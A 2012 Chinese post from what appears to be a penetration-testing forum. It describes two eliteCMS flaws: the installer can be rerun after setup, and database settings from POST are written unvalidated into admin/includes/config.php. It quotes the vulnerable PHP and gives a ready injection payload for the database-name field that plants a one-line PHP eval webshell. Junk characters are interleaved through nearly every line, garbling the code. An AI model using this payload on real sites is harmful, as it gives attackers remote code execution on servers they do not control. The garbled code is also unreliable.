中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
  C7 ?; |+ l; Y9 z0 ~! ]7 ?% T0 Q' i7 H1 _- U5 u7 M+ U8 M
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
7 X, ^8 X0 h& p+ ^我们来看代码:
, N/ t; T+ F% N
6 g, I5 O6 y. J% x...1 ]9 I( _- ~9 A% ^* h! c: w
elseif ($_GET['step'] == "4") {
+ H3 I1 P  ~+ ]: _7 g. r    $file = "../admin/includes/config.php";7 b8 ?; G! P% M- l+ b/ U
    $write = "<?php\n";6 F7 K& S! U3 c, F7 O5 y
    $write .= "/**\n";
" R: g9 `7 l1 W2 F5 T+ F) ?! t    $write .= "*\n";/ |6 _+ b/ U( ^$ U! w; q" B
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
- L& W3 N  ~" q+ i2 p, f. n8 o...略...
: a& A% j9 y4 N1 R3 [. S  g" H4 @    $write .= "*\n";2 d) x. s0 L) y! r. m* `1 s6 m& U
    $write .= "*/\n";
/ A7 B8 _/ f) O! @5 r8 y    $write .= "\n";6 Y! ]4 F* R) B4 b, C( O
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";' q7 B* s' q9 W1 \" s; R) Y6 R
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
+ T* {, t6 W+ J# e3 @* |9 ?8 f    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
6 W0 _+ P; z# i5 f7 y% a" O$ s2 ?    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
0 _8 ^, Z: E$ v, m' X* E    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
. g2 M, Q  Q' B- u/ T3 p6 K    $write .= "if (!\$connection) {\n";& @6 ?& U3 i0 F* W4 f
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
' Z" L# s; j. O% F    $write .= "        \n";* G! F1 n% S1 x3 c% K) I) A: Q2 _
    $write .= "} \n";
7 L* s7 H, W' I! Z! [    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";" ?  l: M7 L: F( [5 C
    $write .= "if (!\$db_select) {\n";
! v5 x$ _9 Z5 P* n: G3 \6 l    $write .= "        die(\"Database select failed\" .mysql_error());\n";0 K1 W9 |/ o, t( K# }% ?
    $write .= "        \n";3 o' \  Y, A# b; `
    $write .= "} \n";
' q9 u" ?" d! ~9 t' E- w& S% z4 {    $write .= "?>\n";
3 ^+ z; E9 A, x7 I* a0 i/ p8 |- r
4 Q4 T1 w% y& ~' `6 p8 d; F- D: f    $writer = fopen($file, 'w');; `+ M* q: s% Y
...
1 I6 d7 J3 Y+ R2 M
% u* n- X6 P/ F% V1 ?在看代码:
5 p/ ]0 `. E3 m% b : ^( y3 @+ I9 n, I- @8 b; T
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
3 g- [8 F, e( r8 k, @; A; ?+ F0 i$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
/ W0 A& E, Q! w& u' v: V& Z$_SESSION['DB_USER'] = $_POST['DB_USER'];" C! D+ x; O& x# Z% f9 H! m- W5 h
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];* ]  t! U6 t; I  n4 F! r* c+ X8 F! C
3 x8 W( g8 b; E. h3 L6 _
取值未作任何验证* c! A- h# v! v& Y$ F4 |
如果将数据库名POST数据:
- ^2 d+ ?, o, C/ E! m ( K; W. H, E& g
"?><?php eval($_POST[c]);?><?php9 v6 V" }) L9 r0 t

7 e! l9 G# w. x' f" W将导致一句话后门写入/admin/includes/config.php
5 k8 l! F. f  v$ f! ~



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2